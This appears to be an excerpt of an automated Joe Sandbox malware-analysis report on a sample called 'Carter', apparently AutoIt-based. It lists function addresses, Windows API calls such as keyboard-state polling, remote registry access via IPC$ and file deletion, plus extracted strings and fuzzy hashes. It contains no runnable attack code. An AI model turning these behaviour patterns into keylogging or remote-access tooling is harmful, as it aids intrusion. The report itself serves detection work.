                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 002DA4F6
                                                                            • __swprintf.LIBCMT ref: 002DA54F
                                                                            • __swprintf.LIBCMT ref: 002DA568
                                                                            • _wprintf.LIBCMT ref: 002DA61E
                                                                            • _wprintf.LIBCMT ref: 002DA63C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-2391861430
                                                                            • Opcode ID: e33d9956b98d3a08f70adb210fc88a6069b0d8ed63f808832d40d22dde947bfd
                                                                            • Instruction ID: 7055e1e53a83e796251bc3a8f92c21d9f48b96045bd6d6e0614ef07ae161bbe7
                                                                            • Opcode Fuzzy Hash: e33d9956b98d3a08f70adb210fc88a6069b0d8ed63f808832d40d22dde947bfd
                                                                            • Instruction Fuzzy Hash: A1516A71822119ABCF15EBA0DD86EEEB77DAF04340F100166F505A21E2EB316E79CF91
                                                                            Function 002D9710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002D951A: __time64.LIBCMT ref: 002D9524
                                                                              • Part of subcall function 00284A8C: _fseek.LIBCMT ref: 00284AA4
                                                                            • __wsplitpath.LIBCMT ref: 002D97EF
                                                                              • Part of subcall function 0029431E: __wsplitpath_helper.LIBCMT ref: 0029435E
                                                                            • _wcscpy.LIBCMT ref: 002D9802
                                                                            • _wcscat.LIBCMT ref: 002D9815
                                                                            • __wsplitpath.LIBCMT ref: 002D983A
                                                                            • _wcscat.LIBCMT ref: 002D9850
                                                                            • _wcscat.LIBCMT ref: 002D9863
                                                                              • Part of subcall function 002D9560: _memmove.LIBCMT ref: 002D9599
                                                                              • Part of subcall function 002D9560: _memmove.LIBCMT ref: 002D95A8
                                                                            • _wcscmp.LIBCMT ref: 002D97AA
                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DE1
                                                                              • Part of subcall function 002D9CF1: _wcscmp.LIBCMT ref: 002D9DF4
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002D9A0D
                                                                            • _wcsncpy.LIBCMT ref: 002D9A80
                                                                            • DeleteFileW.KERNEL32(?,?), ref: 002D9AB6
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002D9ACC
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D9ADD
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002D9AEF
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                            • String ID:
                                                                            • API String ID: 1500180987-0
                                                                            • Opcode ID: 04d8efc64ab8aba29e3ea24d634f8ec50ae5796c181e8ae0695242aff8e7cbe8
                                                                            • Instruction ID: 54a7a9e70fb9cbffa8dfd8881a455640ce54d9cb2758dde4dd533bf07b696e21
                                                                            • Opcode Fuzzy Hash: 04d8efc64ab8aba29e3ea24d634f8ec50ae5796c181e8ae0695242aff8e7cbe8
                                                                            • Instruction Fuzzy Hash: 1CC13CB1910219ABDF15EF95CC85ADEB7BDAF44300F0040ABF609E6251EB709E948F65
                                                                            Function 00285BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00285BF1
                                                                            • GetMenuItemCount.USER32(00337890), ref: 002C0E7B
                                                                            • GetMenuItemCount.USER32(00337890), ref: 002C0F2B
                                                                            • GetCursorPos.USER32(?), ref: 002C0F6F
                                                                            • SetForegroundWindow.USER32(00000000), ref: 002C0F78
                                                                            • TrackPopupMenuEx.USER32(00337890,00000000,?,00000000,00000000,00000000), ref: 002C0F8B
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C0F97
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 2751501086-0
                                                                            • Opcode ID: 1aa2dd22d6a4148a5e28d3e3ef1759ecba055f3a687772f13df400f2afa52a79
                                                                            • Instruction ID: 27df5806d7b957be4a158d729f6616b83c5530a2d5a19f85146a1d59d2eee46f
                                                                            • Opcode Fuzzy Hash: 1aa2dd22d6a4148a5e28d3e3ef1759ecba055f3a687772f13df400f2afa52a79
                                                                            • Instruction Fuzzy Hash: 6471E07066561AFEEB259F54CC85FAABF68FB04724F20021AF528661D1CBB16870DF90
                                                                            Function 002DAEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?,00300980), ref: 002DAF4E
                                                                            • GetDriveTypeW.KERNEL32(00000061,0032B5F0,00000061), ref: 002DB018
                                                                            • _wcscpy.LIBCMT ref: 002DB042
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                            • String ID: L,0$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 2820617543-3005478051
                                                                            • Opcode ID: 747aec761f9ae3f28fb27157a91decc693839904c1cd9cdf22ba4677e4b8be8d
                                                                            • Instruction ID: 31130fd26178d8ec5c7716d1bfb2a8123b9bfb59a3eb5c9310cf0e7c0547740e
                                                                            • Opcode Fuzzy Hash: 747aec761f9ae3f28fb27157a91decc693839904c1cd9cdf22ba4677e4b8be8d
                                                                            • Instruction Fuzzy Hash: BF51DE701283059FC715EF14D891AAAB7A9EF95300F20881EF4995B2E2DB71ED29CF52
                                                                            Function 002C83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            • _memset.LIBCMT ref: 002C8489
                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002C84BE
                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002C84DA
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002C84F6
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002C8520
                                                                            • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002C8548
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C8553
                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C8558
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 1411258926-22481851
                                                                            • Opcode ID: 2dfa6b1d72a8076d54478d4d1b7b5bef7028f6f4d45e64d2489ba15037b1fdc8
                                                                            • Instruction ID: a9b9ccf7e8dc67510c6c7fac7495c8facd20502f501e37342883f10fbf514f94
                                                                            • Opcode Fuzzy Hash: 2dfa6b1d72a8076d54478d4d1b7b5bef7028f6f4d45e64d2489ba15037b1fdc8
                                                                            • Instruction Fuzzy Hash: FE410976C2122DABCF15EFA4DC55EEDB7B8FF04340F00416AE905A21A1EA305D25CF90
                                                                            Function 002F147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            • Opcode ID: fc8f0a099c344c0d003e560ec7c666059f2953454f9832f08082729eb9e728ac
                                                                            • Instruction ID: be4608dedf2589c77ae61bbaf95e84389c89aacdaf7c7292a4dd138b1a996987
                                                                            • Opcode Fuzzy Hash: fc8f0a099c344c0d003e560ec7c666059f2953454f9832f08082729eb9e728ac
                                                                            • Instruction Fuzzy Hash: C541263453026ECBDF05EF90E891AEA7724EF55380FA04425ED525B292DB30ED7ACB61
                                                                            Function 002D5882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                              • Part of subcall function 0028153B: _memmove.LIBCMT ref: 002815C4
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002D58EB
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002D5901
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D5912
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002D5924
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002D5935
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_memmove
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 2279737902-1007645807
                                                                            • Opcode ID: 8ed14307549319bfec962ea37253e00cdbcee6845e0ca1c7d27f9939a1dc164f
                                                                            • Instruction ID: 346fe64ca7b3e61ffac9a0a9efc41d45cf4530950bae7ca03819700f2a6ce58f
                                                                            • Opcode Fuzzy Hash: 8ed14307549319bfec962ea37253e00cdbcee6845e0ca1c7d27f9939a1dc164f
                                                                            • Instruction Fuzzy Hash: D811B235961139B9D720F7A1EC5ADFFAB7CEB91B50F80042AB901A30D0DEB01D25CAE0
                                                                            Function 002D4C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 208665112-3771769585
                                                                            • Opcode ID: 55eb8056f13f890279630a478e205f1ad9dc4b5a4a04148c8b84c3b65be0fc6a
                                                                            • Instruction ID: e65cc55ec920a4ad0c7e8efe87a06a04208875306d61d06d50fa3045ca537a87
                                                                            • Opcode Fuzzy Hash: 55eb8056f13f890279630a478e205f1ad9dc4b5a4a04148c8b84c3b65be0fc6a
                                                                            • Instruction Fuzzy Hash: FC113631535119ABCF16BB64DC4AEEA77BCDF40710F0041A7F408922A1EF709EA58F90
                                                                            Function 002D5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 002D5535
                                                                              • Part of subcall function 0029083E: timeGetTime.WINMM(?,00000002,0027C22C), ref: 00290842
                                                                            • Sleep.KERNEL32(0000000A), ref: 002D5561
                                                                            • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 002D5585
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002D55A7
                                                                            • SetActiveWindow.USER32 ref: 002D55C6
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002D55D4
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 002D55F3
                                                                            • Sleep.KERNEL32(000000FA), ref: 002D55FE
                                                                            • IsWindow.USER32 ref: 002D560A
                                                                            • EndDialog.USER32(00000000), ref: 002D561B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 83660d350937e8f6c91bd32429ebd3731fb2b7083db45c384ef05e544fb80bef
                                                                            • Instruction ID: 6da1cbad649ca18212760e86467bf19ae48b4710a83764c4f59eef81656b4c28
                                                                            • Opcode Fuzzy Hash: 83660d350937e8f6c91bd32429ebd3731fb2b7083db45c384ef05e544fb80bef
                                                                            • Instruction Fuzzy Hash: B321A170215705AFFB575F60ECD9B263B6EEB46346F40141BF401822A1CFB18E60DB62
                                                                            Function 002DDBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • CoInitialize.OLE32(00000000), ref: 002DDC2D
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002DDCC0
                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 002DDCD4
                                                                            • CoCreateInstance.OLE32(00303D4C,00000000,00000001,0032B86C,?), ref: 002DDD20
                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002DDD8F
                                                                            • CoTaskMemFree.OLE32(?,?), ref: 002DDDE7
                                                                            • _memset.LIBCMT ref: 002DDE24
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 002DDE60
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002DDE83
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 002DDE8A
                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002DDEC1
                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 002DDEC3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                            • String ID:
                                                                            • API String ID: 1246142700-0
                                                                            • Opcode ID: e8c8ba9106561172fe7cbcecfe484cb73c7827515953e58f13839f0e0af2526a
                                                                            • Instruction ID: 024ee0a964ae8bfe105f57e963e614c643130410214c4e9600ba7a9fdec0cd8c
                                                                            • Opcode Fuzzy Hash: e8c8ba9106561172fe7cbcecfe484cb73c7827515953e58f13839f0e0af2526a
                                                                            • Instruction Fuzzy Hash: BFB1E775A10509AFDB04EFA4C889EAEBBB9EF48304F14845AE909EB351DB30AD51CF50
                                                                            Function 002D081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 002D0896
                                                                            • SetKeyboardState.USER32(?), ref: 002D0901
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 002D0921
                                                                            • GetKeyState.USER32(000000A0), ref: 002D0938
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 002D0967
                                                                            • GetKeyState.USER32(000000A1), ref: 002D0978
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 002D09A4
                                                                            • GetKeyState.USER32(00000011), ref: 002D09B2
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 002D09DB
                                                                            • GetKeyState.USER32(00000012), ref: 002D09E9
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 002D0A12
                                                                            • GetKeyState.USER32(0000005B), ref: 002D0A20
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 42a25d1886d3af84ac87f5ff29d8a8df8432cb8169f4f15b2ea85d8a3fc953ce
                                                                            • Instruction ID: 2f2ad9287381334a65918af9f7a231aaf0fb2ac9bd55ff200a67815a9cd63b35
                                                                            • Opcode Fuzzy Hash: 42a25d1886d3af84ac87f5ff29d8a8df8432cb8169f4f15b2ea85d8a3fc953ce
                                                                            • Instruction Fuzzy Hash: 8451D92091478929FB35DFB088907EABFB49F01780F08459F85C2577D3DA649E6CCBA1
                                                                            Function 002CCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000001), ref: 002CCE1C
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002CCE2E
                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002CCE8C
                                                                            • GetDlgItem.USER32(?,00000002), ref: 002CCE97
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002CCEA9
                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002CCEFD
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 002CCF0B
                                                                            • GetWindowRect.USER32(00000000,?), ref: 002CCF1C
                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002CCF5F
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 002CCF6D
                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002CCF8A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002CCF97
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: 3e23ce89239d94bef00296327e442beaff60c283f8eaec16120e12076bd7c980
                                                                            • Instruction ID: b03d558ce8c347646f3b09c8cde22c8daf1b2a38946b326505e233e790f35e24
                                                                            • Opcode Fuzzy Hash: 3e23ce89239d94bef00296327e442beaff60c283f8eaec16120e12076bd7c980
                                                                            • Instruction Fuzzy Hash: 32515371B10209AFDB18CF68CD95FAEBBBAEB88710F14822DF519D7290DB709D108B50
                                                                            Function 00272581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729AB: GetWindowLongW.USER32(?,000000EB), ref: 002729BC
                                                                            • GetSysColor.USER32(0000000F), ref: 002725AF
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ColorLongWindow
                                                                            • String ID:
                                                                            • API String ID: 259745315-0
                                                                            • Opcode ID: ee648b3d59f4a2c5462f85faf473ddf5c181ac6b421fb274c5157ec461609d13
                                                                            • Instruction ID: 0ebcc3fa6748816199f2c5ac72189122b7248d311192b6e2f578fe1bd31a0a14
